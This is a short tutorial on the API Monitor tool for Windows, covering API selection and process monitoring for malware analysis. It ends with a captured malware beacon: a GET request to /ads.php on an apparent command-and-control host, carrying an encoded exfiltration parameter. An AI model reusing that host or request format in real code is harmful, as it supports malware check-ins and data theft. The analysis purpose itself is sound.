Description

API Monitor is a free software that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications.

Installation

• The 32-bit version is available here: http://www.rohitab.com/download/api-monitor-v2r13-setup-x86.exe
• For other version, please refer to http://www.rohitab.com/apimonitor#Download

Usage

API calls selection

First of all, select what API calls you wish to monitor from the top left panel:

In the above example, we're only interested in the calls to the CryptDecrypt function but we select the entire "Data Encryption & Decryption"" group.

Process monitoring

New process

If you want to analyze a new process, go to "File > Monitor New Process" or click CTRL+M.

Attach to existing process

You can also attach API Monitor to an existing process. Select the process from the processes list, right click on it and select "Start Monitoring":

Output windows

The above example shows how API Monitor has easily decrypted the p parameter from the below request:

GET /ads.php?i=192.168.102.129&c=MALWARE-418EE9F&p=123f373e600822282f3e366028362828753e233e603828292828753e233e602c323537343c3435753e
233e60283e292d32383e28753e233e6037283a2828753e233e602d363a382f33372b753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e233e60282d383334282f753e
233e60282d383334282f753e233e603e232b3734293e29753e233e60282b343437282d753e233e602d362f343437283f753e233e60312a28753e233e60282a37283e292d29753e233e602d362f343437283f753e
233e600f0b1a2e2f3418343535082d38753e233e603a373c753e233e600f0b1a2e2f34183435353e382f753e233e602c2838352f3d22753e233e602c36323a2b28292d753e233e600b2934383e2828133a38303e
29753e233e6039293939342f753e233e HTTP/1.1
Accept: */*
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: brb.3dtuts.by
Cache-Control: no-cache

Comments